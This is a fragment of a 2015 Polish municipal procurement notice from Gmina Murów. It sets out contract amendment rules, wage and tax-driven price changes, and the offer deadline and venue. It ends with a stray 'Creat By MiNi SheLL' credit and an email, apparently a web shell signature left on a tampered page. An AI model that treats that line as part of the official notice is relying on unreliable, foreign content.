      4)  opis wpływu zmiany na terminy wykonania usługi
4.  Dokonanie zmian, wymaga podpisania aneksu do umowy.
5.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
     1) zmiana danych związanych z obsługą administracyjno- organizacyjną umowy
     2) zmiana danych teleadresowych osób reprezentujących strony lub oznaczenia   
         stron  umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
6.  Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
1) stawki podatku od towarów i usług
2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. O minimalnym wynagrodzeniu za pracę,
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne  jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 
Zmiana określona w ust. 6 pkt.2)i3) umowy będzie możliwa pod warunkiem przedstawienia Zamawiającemu - przed przystąpieniem do realizacji niniejszej umowy oraz przy każdej zmianie liczby lub osób pracowników - imiennej listy pracowników oddelegowanych do realizacji przedmiotowej umowy wraz z :
oświadczeniem o zatrudnieniu wskazanych pracowników na umowę o pracę,
wskazaniem wysokości wynagrodzenia poszczególnych osób wraz z możliwością żądania przez Zamawiającego kopii umów o pracę,
wyliczeniem różnicy pomiędzy dotychczasowym wynagrodzeniem a zmianą wynagrodzenia w związku z okolicznościami wymienionymi w ust.6 pkt 2)i3)
oświadczeniem w jakim stopniu powyższe zmiany wpływają na koszty wykonania umowy gdy zmiany, o których mowa w ust.6 pkt 2) i 3)spowodują wzrost kosztów wykonania Umowy o więcej niż 10% w okresie realizacji umowy. Zmiana wynagrodzenia dotyczy tej części, która pozostała do wykonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można odebrać w Urzędzie Gminy Murów, 46-030 Murów ul. Dworcowa 2 - pokój nr 19..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 09:00, miejsce: Urząd Gminy Murów ul. Dworcowa 2 46-030 Murów pokój nr 10 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com